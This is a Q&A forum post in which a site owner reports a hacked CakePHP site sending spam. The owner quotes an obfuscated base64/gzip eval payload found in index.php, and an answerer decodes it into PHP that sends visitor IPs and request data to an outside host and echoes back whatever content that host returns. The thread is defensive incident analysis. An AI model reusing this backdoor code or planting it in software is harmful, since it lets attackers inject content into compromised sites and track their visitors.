Apr 29, 2012
tom

Site got hacked and it’s sending more than 400 emails per day from my site

Question

Possible Duplicate:
My server's been hacked EMERGENCY

So basically my site got hacked and a script is sending more than 400 emails per day. I have more than 100 files on server, and is there any fast way to check, from which file exactly it is sending? I don’t know when exactly script is sending the mails, so I can’t be sure from which file it’s called. Is there any easy way to find out from which file it’s sent?

 eval(gzuncompress(base64_decode('eF6Nkw9rozAYxr+Kk6EGyuh2f+CQcFdW297h7BZ17ChDokbNNZpi4na70u9+0WvXdnfFA8Hk5fc8Sd4noZl1RoUg0joXiMj6BYB1zniMmbYt2Ns/vFSjUJB6lJNKQiFryRl/JrV1HvkOunfQwpwFwW0Uqlk0mjpeYD4CpZHXTc1muEoZgV7ouruSS6sl1HWbZpal3NRnHSwwMHPOc0ZMAKGWYSYIMIx/ci+44LwfizFNm36sFFU/xFekxv1YUtS8/I8TxLTK+ymBM1zTfi7m8gACa9XfbcKvOSHnZh440Wg8Riojxcq6IZphaG/BLtDZ3A/2GFgf5hdjQT6+j1KS8JRYJp6hYTLmT+7VZJmW9z/iqw8lfvgm3dJ7iv1Pv9LpZOi+84bfH+6aZFo8m0C7MD/TFTS1C2VJqs7m1EYVazTqoLi7gceSfQc6LOUlplWFS3LK+vBorSJrGFthWZzeyl3o+EEUoq9bRVKQZNniu65NnWBhMs6Xf1/8RA0jWtH2nb12D9ibjUrniNTOVJ/bZwLWnUY585U8ZgbXIXLnt0GEnCBEXoBGnj9x0OASdI9VNEzCL52a/CTJsRbY3Yp/qMXwEUJ9rreZ7iu6ptskKbi2K9qbzixhXJC3bpvNbzILaXQ='))); ?> 

This found in index.php file

My site is using cakePHP, so could it be there by default?

Asked by Pienskabe

Answer

Here, I unraveled the code for you:

if(!isset($sRetry)){
    global $sRetry;
    $sRetry=1;
    $sUserAgent=strtolower($_SERVER['HTTP_USER_AGENT']);
    $stCurlHandle=NULL;
    $stCurlLink="";    if((strstr($sUserAgent,'google')== false)&&(strstr($sUserAgent,'yahoo')== false)&&(strstr($sUserAgent,'baidu')== false)&&(strstr($sUserAgent,'msn')== false)&&(strstr($sUserAgent,'opera')== false)&&(strstr($sUserAgent,'chrome')== false)&&(strstr($sUserAgent,'bing')== false)&&(strstr($sUserAgent,'safari')== false)&&(strstr($sUserAgent,'bot')== false)){if(isset($_SERVER['REMOTE_ADDR'])== true && isset($_SERVER['HTTP_HOST'])== true){
        $stCurlLink=base64_decode('aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw') .'ip=' .urlencode($_SERVER['REMOTE_ADDR']) .'&useragent=' .urlencode($sUserAgent) .'&domainname=' .urlencode($_SERVER['HTTP_HOST']) .'&fullpath=' .urlencode($_SERVER['REQUEST_URI']) .'&check=' .isset($_GET['look']);$stCurlHandle=curl_init($stCurlLink);}}if($stCurlHandle !== NULL){curl_setopt($stCurlHandle,CURLOPT_RETURNTRANSFER,1);$sResult=@curl_exec($stCurlHandle);if($sResult[0]=="O"){$sResult[0]=" ";echo $sResult;}curl_close($stCurlHandle);
        }
}

That $stCurlLink ends up becoming http://adveconfirm.com/stat/stat.php. I would recommend removing the code from the page and patching any vulnerabilities that you find. Take a look at your logs to see what pages were accessed by who and what data was sent.

Answered by Mihir Singh

No related posts.

Leave a comment